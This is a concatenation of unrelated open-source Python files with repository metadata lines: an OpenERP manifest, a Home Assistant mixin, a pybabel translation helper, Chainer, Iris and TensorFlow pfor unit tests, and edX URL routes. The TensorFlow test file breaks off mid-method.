nodes[:] = [
n for n in nodes
if (n not in to_rm)
]
def apply(self, hls: "HlsStreamProc", to_hw: "SsaSegmentToHwPipeline"):
self._apply(to_hw.hls.nodes)
| Nic30/hwtHls | hwtHls/netlist/transformation/mergeExplicitSync.py | Python | mit | 3,384 |
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-TODAY OpenERP s.a. (<http://www.openerp.com>).
# Copyright (C) 2012-TODAY Mentis d.o.o. (<http://www.mentis.si/openerp>)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Purchase Landing Costs',
'version': '1.1',
'category': 'Warehouse Management',
'description': """
This module extends average price computation with landing costs definition
The landed costs can be defined for purchase orders and/or stock pickings
and are distributed through per value or per unit method.
""",
'author': 'Mentis d.o.o.',
'depends': ['purchase'],
'init_xml': [],
'update_xml': ['security/ir.model.access.csv',
'product_template_view.xml',
'purchase_order_view.xml',
'stock_picking_in_view.xml',
#'stock_move_landing_costs_view.xml',
],
'demo_xml': [],
'installable': True,
'active': False,
}
| codeback/openerp-purchase_landing_costs | __openerp__.py | Python | agpl-3.0 | 1,849 |
"""Mixin class for handling connection state changes."""
import logging
from homeassistant.helpers.event import async_call_later
_LOGGER = logging.getLogger(__name__)
TIME_MARK_DISCONNECTED = 10
class ConnectionStateMixin:
"""Base implementation for connection state handling."""
def __init__(self):
"""Initialize this mixin instance."""
super().__init__()
self._unsub_mark_disconnected = None
async def got_connected(self, _=None):
"""Notification that we're connected to the HUB."""
_LOGGER.debug("%s: connected to the HUB", self._name)
self.async_write_ha_state()
self._clear_disconnection_delay()
async def got_disconnected(self, _=None):
"""Notification that we're disconnected from the HUB."""
_LOGGER.debug("%s: disconnected from the HUB", self._name)
# We're going to wait for 10 seconds before announcing we're
# unavailable, this to allow a reconnection to happen.
self._unsub_mark_disconnected = async_call_later(
self.hass, TIME_MARK_DISCONNECTED, self._mark_disconnected_if_unavailable
)
def _clear_disconnection_delay(self):
if self._unsub_mark_disconnected:
self._unsub_mark_disconnected()
self._unsub_mark_disconnected = None
def _mark_disconnected_if_unavailable(self, _):
self._unsub_mark_disconnected = None
if not self.available:
# Still disconnected. Let the state engine know.
self.async_write_ha_state()
| partofthething/home-assistant | homeassistant/components/harmony/connection_state.py | Python | apache-2.0 | 1,550 |
"""
Helper file to manage translations for the Meerkat Authentication module.
We have two types of translations, general and implementation specific
The general translations are extracted from the python, jijna2 and js files.
"""
from csv import DictReader
import argparse
import os
import shutil
import datetime
from babel.messages.pofile import read_po, write_po
from babel.messages.catalog import Catalog, Message
from babel._compat import BytesIO
parser = argparse.ArgumentParser()
parser.add_argument("action",
choices=["update-po", "initialise", "compile" ],
help="Choose action" )
parser.add_argument("-l", type=str,
help="Two letter langauge code")
if __name__ == "__main__":
args = parser.parse_args()
lang_dir = "meerkat_auth"
if args.action == "update-po":
os.system("pybabel extract -F babel.cfg -o {}/messages.pot .".format(lang_dir) )
os.system("pybabel update -i {}/messages.pot -d {}/translations".format(lang_dir, lang_dir) )
os.system("rm {}/messages.pot".format(lang_dir))
elif args.action == "initialise":
if args.l and len(args.l) == 2:
os.system("pybabel extract -F babel.cfg -o {}/messages.pot .".format(lang_dir) )
os.system("pybabel init -i {}/messages.pot -d {}/translations -l {}".format(
lang_dir, lang_dir,args.l
))
os.system("pybabel update -i {}/messages.pot -d {}/translations".format(lang_dir, lang_dir) )
os.system("rm {}/messages.pot".format(lang_dir))
else:
print("Need to specify a two letter language code")
elif args.action == "compile":
os.system("pybabel compile -d {}/translations".format(lang_dir))
| meerkat-code/meerkat_auth | translate.py | Python | mit | 1,780 |
import unittest
import numpy
import chainer
from chainer import cuda
from chainer import functions
from chainer import gradient_check
from chainer.testing import attr
from chainer.testing import condition
if cuda.available:
cuda.init()
class TestNonparameterizedConvolution2D(unittest.TestCase):
def setUp(self, use_cudnn=True):
in_channels = 3
out_channels = 2
kh, kw = (3, 3)
self.stride = 2
self.pad = 1
self.use_cudnn = use_cudnn
self.W = numpy.random.normal(
0, numpy.sqrt(1. / (kh * kw * in_channels)),
(out_channels, in_channels, kh, kw)).astype(numpy.float32)
self.b = numpy.random.uniform(
-1, 1, out_channels).astype(numpy.float32)
self.x = numpy.random.uniform(-1, 1,
(2, 3, 4, 3)).astype(numpy.float32)
self.gy = numpy.random.uniform(-1, 1,
(2, 2, 2, 2)).astype(numpy.float32)
@attr.cudnn
def test_forward_consistency(self):
x_cpu = chainer.Variable(self.x)
W_cpu = chainer.Variable(self.W)
b_cpu = chainer.Variable(self.b)
y_cpu = functions.convolution_2d(
x_cpu, W_cpu, b_cpu, stride=self.stride, pad=self.pad,
use_cudnn=self.use_cudnn)
x_gpu = chainer.Variable(cuda.to_gpu(self.x))
W_gpu = chainer.Variable(cuda.to_gpu(self.W))
b_gpu = chainer.Variable(cuda.to_gpu(self.b))
y_gpu = functions.convolution_2d(
x_gpu, W_gpu, b_gpu, stride=self.stride, pad=self.pad,
use_cudnn=self.use_cudnn)
gradient_check.assert_allclose(y_cpu.data, y_gpu.data.get())
@attr.gpu
def test_forward_consistency_im2col(self):
self.use_cudnn = False
self.test_forward_consistency()
def check_backward(self, x_data, W_data, b_data, y_grad):
x = chainer.Variable(x_data)
W = chainer.Variable(W_data)
b = chainer.Variable(b_data)
y = functions.convolution_2d(x, W, b, stride=self.stride, pad=self.pad,
use_cudnn=self.use_cudnn)
y.grad = y_grad
y.backward()
func = y.creator
f = lambda: func.forward((x.data, W.data, b.data))
gx, gW, gb = gradient_check.numerical_grad(
f, (x.data, W.data, b.data), (y.grad,), eps=1e-2)
gradient_check.assert_allclose(gx, x.grad)
gradient_check.assert_allclose(gW, W.grad)
gradient_check.assert_allclose(gb, b.grad)
@condition.retry(3)
def test_backward_cpu(self):
self.check_backward(self.x, self.W, self.b, self.gy)
@attr.cudnn
@condition.retry(3)
def test_backward_gpu(self):
self.check_backward(cuda.to_gpu(self.x), cuda.to_gpu(self.W),
cuda.to_gpu(self.b), cuda.to_gpu(self.gy))
@attr.gpu
@condition.retry(3)
def test_backward_gpu_im2col(self):
self.use_cudnn = False
self.test_backward_gpu()
| tereka114/chainer | tests/functions_tests/test_nonparameterized_convolution_2d.py | Python | mit | 3,032 |
# (C) British Crown Copyright 2012 - 2014, Met Office
#
# This file is part of Iris.
#
# Iris is free software: you can redistribute it and/or modify it under
# the terms of the GNU Lesser General Public License as published by the
# Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Iris is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Iris. If not, see <http://www.gnu.org/licenses/>.
from __future__ import (absolute_import, division, print_function)
# import iris tests first so that some things can be initialised before
# importing anything else
import iris.tests as tests
import numpy as np
import iris
import iris.fileformats.abf
@tests.skip_data
class TestAbfLoad(tests.IrisTest):
def setUp(self):
self.path = tests.get_data_path(('abf', 'AVHRRBUVI01.1985apra.abf'))
def test_load(self):
cubes = iris.load(self.path)
# On a 32-bit platform the time coordinate will have 32-bit integers.
# We force them to 64-bit to ensure consistent test results.
time_coord = cubes[0].coord("time")
time_coord.points = np.array(time_coord.points, dtype=np.int64)
time_coord.bounds = np.array(time_coord.bounds, dtype=np.int64)
# Normalise the different array orders returned by version 1.6
# and 1.7 of NumPy.
cubes[0].data = cubes[0].data.copy(order='C')
self.assertCML(cubes, ("abf", "load.cml"))
def test_fill_value(self):
field = iris.fileformats.abf.ABFField(self.path)
# Make sure the fill value is appropriate. It must avoid the
# data range (0 to 100 inclusive) but still fit within the dtype
# range (0 to 255 inclusive).
self.assertGreater(field.data.fill_value, 100)
self.assertLess(field.data.fill_value, 256)
if __name__ == '__main__':
tests.main()
| Jozhogg/iris | lib/iris/tests/test_abf.py | Python | lgpl-3.0 | 2,149 |
# pylint: disable=unicode-format-string
"""
Defines the URL routes for this app.
NOTE: These views are deprecated. These routes are superseded by
``/api/user/v1/accounts/{username}/image``, found in
``openedx.core.djangoapps.user_api.urls``.
"""
# pylint: enable=unicode-format-string
from __future__ import absolute_import
from django.conf import settings
from django.conf.urls import url
from .views import ProfileImageRemoveView, ProfileImageUploadView
urlpatterns = [
url(
r'^v1/' + settings.USERNAME_PATTERN + '/upload$',
ProfileImageUploadView.as_view(),
name="profile_image_upload"
),
url(
r'^v1/' + settings.USERNAME_PATTERN + '/remove$',
ProfileImageRemoveView.as_view(),
name="profile_image_remove"
),
]
| ESOedX/edx-platform | openedx/core/djangoapps/profile_images/urls.py | Python | agpl-3.0 | 784 |
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for pfor and for_loop."""
# pylint: disable=g-direct-tensorflow-import
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import time
from absl.testing import parameterized
import numpy as np
from tensorflow.core.example import example_pb2
from tensorflow.core.example import feature_pb2
from tensorflow.python.client import session
from tensorflow.python.eager import backprop
from tensorflow.python.eager import def_function
from tensorflow.python.framework import config
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import indexed_slices
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import bitwise_ops
from tensorflow.python.ops import cond_v2
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import control_flow_v2_toggles
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.ops import functional_ops
from tensorflow.python.ops import gen_list_ops
from tensorflow.python.ops import gen_nn_ops
from tensorflow.python.ops import gradient_checker_v2
from tensorflow.python.ops import gradients as gradient_ops
from tensorflow.python.ops import image_ops
from tensorflow.python.ops import list_ops
from tensorflow.python.ops import logging_ops
from tensorflow.python.ops import map_fn
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn
from tensorflow.python.ops import parsing_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import rnn
from tensorflow.python.ops import rnn_cell
from tensorflow.python.ops import stateless_random_ops
from tensorflow.python.ops import tensor_array_grad # pylint: disable=unused-import
from tensorflow.python.ops import tensor_array_ops
from tensorflow.python.ops import variables
from tensorflow.python.ops.parallel_for import control_flow_ops as pfor_control_flow_ops
from tensorflow.python.ops.parallel_for.test_util import PForTestCase
from tensorflow.python.ops.signal import fft_ops
from tensorflow.python.platform import test
from tensorflow.python.util import nest
@test_util.run_all_in_graph_and_eager_modes
@test_util.with_control_flow_v2
class PForTest(PForTestCase):
def test_op_conversion_fallback_to_while_loop(self):
# Note that we used top_k op for this test. If a converter gets defined for
# it, we will need to find another op for which a converter has not been
# defined.
x = random_ops.random_uniform([3, 2, 4])
def loop_fn(i):
x_i = array_ops.gather(x, i)
return nn.top_k(x_i)
with self.assertRaisesRegex(ValueError, "No pfor vectorization"):
self._test_loop_fn(loop_fn, 3, fallback_to_while_loop=False)
self._test_loop_fn(loop_fn, 3, fallback_to_while_loop=True)
def test_parallel_iterations(self):
for parallel_iterations in [2, 3, 8, 10]:
x = random_ops.random_uniform([8, 3])
# pylint: disable=cell-var-from-loop
def loop_fn(i):
return array_ops.gather(x, i)
# pylint: enable=cell-var-from-loop
self._test_loop_fn(loop_fn, 8, parallel_iterations=parallel_iterations)
self._test_loop_fn(
loop_fn,
4 * constant_op.constant(2),
parallel_iterations=parallel_iterations)
def test_parallel_iterations_zero(self):
with self.assertRaisesRegex(ValueError, "positive integer"):
pfor_control_flow_ops.pfor(lambda i: 1, 8, parallel_iterations=0)
with self.assertRaisesRegex(TypeError, "positive integer"):
pfor_control_flow_ops.for_loop(
lambda i: 1, dtypes.int32, 8, parallel_iterations=0)
def test_parallel_iterations_one(self):
with self.assertRaisesRegex(ValueError, "Use for_loop instead"):
pfor_control_flow_ops.pfor(lambda i: 1, 8, parallel_iterations=1)
def test_vectorized_map(self):
def compute(x):
return math_ops.reduce_mean(x, axis=0, keepdims=True)
result = pfor_control_flow_ops.vectorized_map(compute,
array_ops.ones((10, 5, 3)))
self.run_and_assert_equal(result, array_ops.ones((10, 1, 3)))
def test_vectorized_map_with_dynamic_shape(self):
def compute(x):
return math_ops.reduce_mean(x, axis=0, keepdims=True)
x = array_ops.placeholder_with_default(
array_ops.ones((10, 5, 3)), shape=None)
result = pfor_control_flow_ops.vectorized_map(compute, x)
self.run_and_assert_equal(result, array_ops.ones((10, 1, 3)))
def test_vectorized_map_broadcasts_unit_dimensions(self):
convert_with_static_shape = ops.convert_to_tensor
convert_with_dynamic_shape = (
lambda x: array_ops.placeholder_with_default(x, shape=None))
for convert in (convert_with_static_shape, convert_with_dynamic_shape):
a = convert([3.1])
b = convert([-2., 6., 9.])
# One elem with leading unit dimension.
a_plus_1 = pfor_control_flow_ops.vectorized_map(lambda a: a + 1, a)
self.assertAllEqual(*self.evaluate((a_plus_1, a + 1)))
# Two elems, both with leading unit dimension.
a_plus_a = pfor_control_flow_ops.vectorized_map(sum, (a, a))
self.assertAllEqual(*self.evaluate((a_plus_a, a + a)))
# Elem w/ unit dimension broadcast against elem with batch dim.
a_plus_b = pfor_control_flow_ops.vectorized_map(sum, (a, b))
self.assertAllEqual(*self.evaluate((a_plus_b, a + b)))
def test_vectorized_map_example_1(self):
def outer_product(a):
return math_ops.tensordot(a, a, 0)
batch_size = 100
a = array_ops.ones((batch_size, 32, 32))
c = pfor_control_flow_ops.vectorized_map(outer_product, a)
self.assertAllEqual((batch_size, 32, 32, 32, 32), c.shape)
def test_disable_tf_function(self):
def_function.run_functions_eagerly(True)
# vectorized_map should ignore disabling tf.functions
self.assertTrue(def_function.functions_run_eagerly())
self.assertAllEqual([0, 1, 4, 9],
pfor_control_flow_ops.vectorized_map(
lambda x: x * x, math_ops.range(4)))
self.assertTrue(def_function.functions_run_eagerly())
@test_util.run_all_in_graph_and_eager_modes
class IndexedSlicesTest(PForTestCase):
def test_indexed_slices(self):
def loop_fn(i):
return indexed_slices.IndexedSlices(
indices=i, values=array_ops.reshape(i, [1]), dense_shape=[3, 1])
self._test_loop_fn(loop_fn, 2)
def test_indexed_slices_components(self):
def loop_fn(i):
slices = indexed_slices.IndexedSlices(
indices=i, values=array_ops.reshape(i, [1]), dense_shape=[3, 1])
# Note that returning the components inside the slice avoids
# densification, which may be more efficient.
return slices.values, slices.indices
self._test_loop_fn(loop_fn, 2)
@test_util.run_all_in_graph_and_eager_modes
class ReductionTest(PForTestCase):
def test_reduce(self):
def reduce_fn(p, q):
return math_ops.reduce_mean(p + q, axis=0)
x = random_ops.random_uniform([4, 3, 2])
y = random_ops.random_uniform([4, 3, 2])
def loop_fn(i, pfor_config):
x_i = array_ops.gather(x, i)
y_i = array_ops.gather(y, i)
reduced = pfor_config.reduce(reduce_fn, x_i, y_i)
return reduced + x_i
output = pfor_control_flow_ops.pfor(loop_fn, 4)
ans = reduce_fn(x, y) + x
output_val, ans_val = self.evaluate([output, ans])
self.assertAllClose(ans_val, output_val)
def test_reduce_concat(self):
x = random_ops.random_uniform([8, 3])
def loop_fn(i, pfor_config):
x_i = array_ops.gather(x, i)
vectorized_value = pfor_config.reduce_concat(x_i)
mean_value = math_ops.reduce_mean(vectorized_value, axis=0)
return x_i - mean_value
output = pfor_control_flow_ops.pfor(loop_fn, 8)
ans = x - math_ops.reduce_mean(x, axis=0)
output_val, ans_val = self.evaluate([output, ans])
self.assertAllClose(ans_val, output_val)
def test_reduce_mean(self):
x = random_ops.random_uniform([8, 3])
def loop_fn(i, pfor_config):
x_i = array_ops.gather(x, i)
return x_i - pfor_config.reduce_mean(x_i)
output = pfor_control_flow_ops.pfor(loop_fn, 8)
ans = x - math_ops.reduce_mean(x, axis=0)
output_val, ans_val = self.evaluate([output, ans])
self.assertAllClose(ans_val, output_val)
def test_reduce_sum(self):
x = random_ops.random_uniform([8, 3])
def loop_fn(i, pfor_config):
x_i = array_ops.gather(x, i)
return x_i - pfor_config.reduce_sum(x_i)
output = pfor_control_flow_ops.pfor(loop_fn, 8)
ans = x - math_ops.reduce_sum(x, axis=0)
output_val, ans_val = self.evaluate([output, ans])
self.assertAllClose(ans_val, output_val)
def test_reduce_class(self):
x = random_ops.random_uniform([8, 3])
class LoopFn(object):
def __init__(self):
pass
def __call__(self, i, pfor_config):
x_i = array_ops.gather(x, i)
return x_i - pfor_config.reduce_mean(x_i)
output = pfor_control_flow_ops.pfor(LoopFn(), 8)
ans = x - math_ops.reduce_mean(x, axis=0)
output_val, ans_val = self.evaluate([output, ans])
self.assertAllClose(ans_val, output_val)
def test_reduce_functools_partial(self):
x = random_ops.random_uniform([8, 3])
def fn(i, pfor_config, dummy=None):
del dummy
x_i = array_ops.gather(x, i)
return x_i - pfor_config.reduce_mean(x_i)
loop_fn = functools.partial(fn, dummy=1)
output = pfor_control_flow_ops.pfor(loop_fn, 8)
ans = x - math_ops.reduce_mean(x, axis=0)
output_val, ans_val = self.evaluate([output, ans])
self.assertAllClose(ans_val, output_val)
def test_parallel_iterations(self):
x = random_ops.random_uniform([8, 3])
def loop_fn(i, pfor_config):
x_i = array_ops.gather(x, i)
return pfor_config.reduce_sum(x_i)
with self.assertRaisesRegex(ValueError,
"parallel_iterations currently unsupported"):
pfor_control_flow_ops.pfor(loop_fn, 8, parallel_iterations=2)
@test_util.run_all_in_graph_and_eager_modes
class BitwiseTest(PForTestCase):
def test_unary_cwise(self):
for op in [bitwise_ops.invert]:
x = random_ops.random_uniform([7, 3, 5], maxval=10, dtype=dtypes.int32)
# pylint: disable=cell-var-from-loop
def loop_fn(i):
x1 = array_ops.gather(x, i)
return op(x1)
# pylint: enable=cell-var-from-loop
self._test_loop_fn(loop_fn, 3)
def test_binary_cwise(self):
binary_ops = [
bitwise_ops.bitwise_and,
bitwise_ops.bitwise_or,
bitwise_ops.bitwise_xor,
bitwise_ops.left_shift,
bitwise_ops.right_shift,
]
for op in binary_ops:
x = random_ops.random_uniform([7, 3, 5], maxval=10, dtype=dtypes.int32)
y = random_ops.random_uniform([3, 5], maxval=10, dtype=dtypes.int32)
output_dtypes = []
# pylint: disable=cell-var-from-loop
def loop_fn(i):
x1 = array_ops.gather(x, i)
y1 = array_ops.gather(y, i)
outputs = [op(x, y), op(x1, y), op(x, y1), op(x1, y1), op(x1, x1)]
del output_dtypes[:]
output_dtypes.extend(t.dtype for t in outputs)
return outputs
# pylint: enable=cell-var-from-loop
self._test_loop_fn(loop_fn, 3)
@test_util.run_all_in_graph_and_eager_modes
class ImageTest(PForTestCase):
def test_adjust_contrast(self):
images = random_ops.random_uniform([3, 2, 4, 4, 3])
def loop_fn(i):
image = array_ops.gather(images, i)
return image_ops.adjust_contrast(image, 2.0)
self._test_loop_fn(loop_fn, 3)
def test_adjust_hue(self):
images = random_ops.random_uniform([3, 2, 4, 4, 3])
def loop_fn(i):
image = array_ops.gather(images, i)
return image_ops.adjust_hue(image, .25)
self._test_loop_fn(loop_fn, 3)
def test_adjust_saturation(self):
images = random_ops.random_uniform([3, 2, 4, 4, 3])
def loop_fn(i):
image = array_ops.gather(images, i)
return image_ops.adjust_saturation(image, 0.1)
self._test_loop_fn(loop_fn, 3)
@test_util.run_all_in_graph_and_eager_modes
class NNTest(PForTestCase):
def test_conv2d(self):
x = random_ops.random_uniform([3, 2, 12, 12, 3])
filt = random_ops.random_uniform([3, 3, 3, 7])
def loop_fn(i):
x1 = array_ops.gather(x, i)
return nn.conv2d(
x1, filt, strides=[1, 2, 2, 1], padding="VALID", data_format="NHWC")
self._test_loop_fn(loop_fn, 3)
def test_conv2d_backprop_input(self):
x_shape = [2, 12, 12, 3]
filt = random_ops.random_uniform([3, 3, 3, 7])
grad = random_ops.random_uniform([3, 2, 5, 5, 7])
def loop_fn(i):
grad1 = array_ops.gather(grad, i)
return nn.conv2d_backprop_input(
x_shape,
filt,
grad1,
strides=[1, 2, 2, 1],
padding="VALID",
data_format="NHWC")
self._test_loop_fn(loop_fn, 3)
def test_conv2d_backprop_filter(self):
x = random_ops.random_uniform([3, 2, 12, 12, 3])
x_0 = array_ops.gather(x, 0)
filter_sizes = [3, 3, 3, 7]
grad = random_ops.random_uniform([3, 2, 5, 5, 7])
def loop_fn(i):
x_i = array_ops.gather(x, i)
grad_i = array_ops.gather(grad, i)
return [
nn.conv2d_backprop_filter(
inp,
filter_sizes,
grad_i,
strides=[1, 2, 2, 1],
padding="VALID",
data_format="NHWC") for inp in [x_i, x_0]
]
self._test_loop_fn(loop_fn, 3)
def test_avg_pool(self):
with backprop.GradientTape(persistent=True) as g:
x = random_ops.random_uniform([3, 2, 12, 12, 3])
g.watch(x)
ksize = [1, 3, 3, 1]
def loop_fn(i):
with g:
x1 = array_ops.gather(x, i)
output = nn.avg_pool(
x1,
ksize,
strides=[1, 2, 2, 1],
padding="VALID",
data_format="NHWC")
loss = nn.l2_loss(output)
return output, g.gradient(loss, x1)
self._test_loop_fn(loop_fn, 3)
def test_avg_pool3d(self):
with backprop.GradientTape(persistent=True) as g:
x = random_ops.random_uniform([5, 3, 7, 6, 6, 5])
g.watch(x)
ksize = [1, 2, 2, 2, 1]
strides = [1, 2, 2, 2, 1]
def loop_fn(i):
with g:
x1 = array_ops.gather(x, i)
output = nn.avg_pool3d(
x1, ksize, strides=strides, padding="VALID", data_format="NDHWC")
loss = nn.l2_loss(output)
return output, g.gradient(loss, x1)
self._test_loop_fn(loop_fn, 3)
def test_max_pool(self):
with backprop.GradientTape(persistent=True) as g:
x = random_ops.random_uniform([3, 2, 12, 12, 3])
g.watch(x)
ksize = [1, 3, 3, 1]
strides = [1, 2, 2, 1]
def loop_fn(i):
with g:
x1 = array_ops.gather(x, i)
output = nn.max_pool(
x1, ksize, strides=strides, padding="VALID", data_format="NHWC")
loss = nn.l2_loss(output)
ones = array_ops.ones_like(output)
g.watch(ones)
grad = g.gradient(loss, x1, output_gradients=ones)
grad_grad = g.gradient(grad, ones)
return output, grad, grad_grad
self._test_loop_fn(loop_fn, 3)
def test_max_pool_v2(self):
with backprop.GradientTape(persistent=True) as g:
x = random_ops.random_uniform([3, 2, 12, 12, 3])
g.watch(x)
ksize = [1, 3, 3, 1]
strides = [1, 2, 2, 1]
def loop_fn(i):
with g:
x1 = array_ops.gather(x, i)
output = gen_nn_ops.max_pool_v2(
x1, ksize, strides=strides, padding="VALID", data_format="NHWC")
loss = nn.l2_loss(output)
ones = array_ops.ones_like(output)
g.watch(ones)
grad = g.gradient(loss, x1, output_gradients=ones)
grad_grad = g.gradient(grad, ones)
return output, grad, grad_grad
self._test_loop_fn(loop_fn, 3)
def test_max_pool3d(self):
with backprop.GradientTape(persistent=True) as g:
x = random_ops.random_uniform([3, 3, 2, 12, 12, 3])
g.watch(x)
ksize = [1, 1, 3, 3, 1]
strides = [1, 1, 2, 2, 1]
def loop_fn(i):
with g:
x1 = array_ops.gather(x, i)
output = nn.max_pool3d(
x1, ksize, strides=strides, padding="VALID", data_format="NDHWC")
loss = nn.l2_loss(output)
ones = array_ops.ones_like(output)
g.watch(ones)
grad = g.gradient(loss, x1, output_gradients=ones)
grad_grad = g.gradient(grad, ones)
return output, grad, grad_grad
self._test_loop_fn(loop_fn, 3)
def test_fused_batch_norm(self):
data_formats = ["NHWC"]
if test.is_gpu_available():
data_formats.append("NCHW")
for is_training in (True, False):
for data_format in data_formats:
with backprop.GradientTape(persistent=True) as g:
if data_format == "NCHW":
x = random_ops.random_uniform([3, 1, 2, 5, 5])
else:
x = random_ops.random_uniform([3, 1, 5, 5, 2])
g.watch(x)
scale = random_ops.random_uniform([2])
g.watch(scale)
offset = random_ops.random_uniform([2])
g.watch(offset)
mean = None if is_training else random_ops.random_uniform([2])
variance = None if is_training else random_ops.random_uniform([2])
# pylint: disable=cell-var-from-loop
def loop_fn(i):
with g:
x1 = array_ops.gather(x, i)
outputs = nn.fused_batch_norm(
x1,
scale,
offset,
mean=mean,
variance=variance,
epsilon=0.01,
data_format=data_format,
is_training=is_training)
outputs = list(outputs)
# We only test the first value of outputs when is_training is
# False. It looks like CPU and GPU have different outputs for
# batch_mean and batch_variance for this case.
if not is_training:
outputs[1] = constant_op.constant(0.)
outputs[2] = constant_op.constant(0.)
loss = nn.l2_loss(outputs[0])
if is_training:
gradients = g.gradient(loss, [x1, scale, offset])
else:
gradients = [constant_op.constant(0.)] * 3
return outputs + gradients
# pylint: enable=cell-var-from-loop
self._test_loop_fn(loop_fn, 3)
def test_log_softmax(self):
logits = random_ops.random_uniform([3, 2, 4])
def loop_fn(i):
logits_i = array_ops.gather(logits, i)
return (nn.log_softmax(logits_i), nn.log_softmax(logits_i, axis=0),
nn.log_softmax(logits_i, axis=-1))
self._test_loop_fn(loop_fn, 3)
def test_softmax(self):
logits = random_ops.random_uniform([3, 2, 4])
def loop_fn(i):
logits_i = array_ops.gather(logits, i)
return (nn.softmax(logits_i), nn.softmax(logits_i, axis=0),
nn.softmax(logits_i, axis=-1))
self._test_loop_fn(loop_fn, 3)
def test_softmax_cross_entropy_with_logits(self):
with backprop.GradientTape(persistent=True) as g:
logits = random_ops.random_uniform([3, 2, 4])
g.watch(logits)
labels = random_ops.random_uniform([3, 2, 4])
labels /= math_ops.reduce_sum(labels, axis=[2], keepdims=True)
def loop_fn(i):
with g:
logits_i = array_ops.gather(logits, i)
labels_i = array_ops.gather(labels, i)
loss = nn.softmax_cross_entropy_with_logits(
labels=labels_i, logits=logits_i)
total_loss = math_ops.reduce_sum(loss)
return loss, g.gradient(total_loss, logits_i)
self._test_loop_fn(loop_fn, 3)
def test_sparse_softmax_cross_entropy_with_logits(self):
logits = random_ops.random_uniform([3, 2, 4])
labels = random_ops.random_uniform(
shape=[3, 2], maxval=4, dtype=dtypes.int32)
def loop_fn(i):
logits_i = array_ops.gather(logits, i)
labels_i = array_ops.gather(labels, i)
loss = nn.sparse_softmax_cross_entropy_with_logits(
labels=labels_i, logits=logits_i)
return loss
self._test_loop_fn(loop_fn, 3)
class RandomTest(PForTestCase):
# The random values generated in the two implementations are not guaranteed to
# match. So we only check the returned shapes.
def run_and_assert_equal(self, targets1, targets2, rtol=1e-4, atol=1e-5):
outputs = self._run_targets(targets1, targets2)
n = len(outputs) // 2
for i in range(n):
self.assertAllEqual(outputs[i].shape, outputs[i + n].shape)
def test_random_uniform(self):
def loop_fn(_):
return random_ops.random_uniform([3])
self._test_loop_fn(loop_fn, 5)
def test_random_uniform_int(self):
def loop_fn(_):
return random_ops.random_uniform([3], maxval=1, dtype=dtypes.int32)
self._test_loop_fn(loop_fn, 5)
def test_random_standard_normal(self):
def loop_fn(_):
return random_ops.random_normal([3])
self._test_loop_fn(loop_fn, 5)
def test_truncated_normal(self):
def loop_fn(_):
return random_ops.truncated_normal([3])
self._test_loop_fn(loop_fn, 5)
def test_random_gamma_invariant_alpha(self):
def loop_fn(_):
return random_ops.random_gamma([3], alpha=[0.5])
self._test_loop_fn(loop_fn, 5)
def test_random_gamma_varying_alpha(self):
alphas = math_ops.exp(random_ops.random_normal([5, 3, 2]))
def loop_fn(i):
alphas_i = array_ops.gather(alphas, i)
# Test both scalar and non-scalar params and shapes.
return (random_ops.random_gamma(alpha=alphas_i[0, 0], shape=[]),
random_ops.random_gamma(alpha=alphas_i, shape=[]),
random_ops.random_gamma(alpha=alphas_i[0, 0], shape=[3]),
random_ops.random_gamma(alpha=alphas_i, shape=[3]))
self._test_loop_fn(loop_fn, 5)
def test_random_poisson_v2_invariant_rate(self):
def loop_fn(_):
return random_ops.random_poisson(lam=[1.3], shape=[3])
self._test_loop_fn(loop_fn, 5)
def test_random_poisson_v2_varying_rate(self):
rates = math_ops.exp(random_ops.random_normal([5, 3, 2]))
def loop_fn(i):
rates_i = array_ops.gather(rates, i)
# Test both scalar and non-scalar params and shapes.
return (random_ops.random_poisson(lam=rates_i[0, 0], shape=[]),
random_ops.random_poisson(lam=rates_i, shape=[]),
random_ops.random_poisson(lam=rates_i[0, 0], shape=[3]),
random_ops.random_poisson(lam=rates_i, shape=[3]))
self._test_loop_fn(loop_fn, 5)
def test_random_multinomial_invariant_logits(self):
def loop_fn(_):
return random_ops.categorical(logits=[[1., -1.]], num_samples=3)
self._test_loop_fn(loop_fn, 5)
def test_random_multinomial_varying_logits(self):
logits = random_ops.random_normal([5, 3, 2])
def loop_fn(i):
logits_i = array_ops.gather(logits, i)
return random_ops.categorical(logits_i, num_samples=3)
self._test_loop_fn(loop_fn, 5)
class StatelessRandomTest(PForTestCase):
# This test currently only tests that the vectorized and non-vectorized
# outputs have same shapes. This is needed since under XLA compilation,
# stateless random numbers can generate different random numbers.
# TODO(agarwal): switch to checking for actual values matching once
# b/149402339 is resolved.
def run_and_assert_equal(self, targets1, targets2, rtol=1e-4, atol=1e-5):
outputs = self._run_targets(targets1, targets2)
n = len(outputs) // 2
